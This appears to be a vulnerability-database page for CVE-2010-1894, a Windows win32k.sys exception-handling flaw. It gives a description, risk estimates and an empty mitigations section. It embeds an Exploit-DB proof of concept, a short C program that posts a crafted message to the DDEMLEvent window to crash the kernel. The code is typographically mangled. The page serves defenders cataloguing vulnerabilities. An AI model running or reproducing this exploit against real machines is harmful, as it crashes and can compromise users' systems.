CVE-2010-1894

high

Published 2010-08-11 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.2

Description

The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability."

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-14611 dos windows c · 1 KB

MJ0011 · 2010-08-10

Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)

c exploit Source: Exploit-DB

/*
source: https://www.securityfocus.com/bid/39630/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.

Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue. 
*/

# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");
 
getchar();
 
HWND hwnd = FindWindow ("DDEMLEvent", NULL);
 
if (hwnd == 0)
(
   printf ("cannot find DDEMLEvent Window! \ n");
   return 0;
)
 
PostMessage (hwnd, 0x4c, 0x4, 0x80000000);
 
 
return 0;
)

EDB-12336 dos windows

MJ0011 · 2010-04-22

Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service

Source code queued for fetch — refresh in a moment.

OS impact

Windows Affected 2 releases

Version	Status	Fixed in
-	Affected	—
—	Affected	—

References

CWEs

CWE-264

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.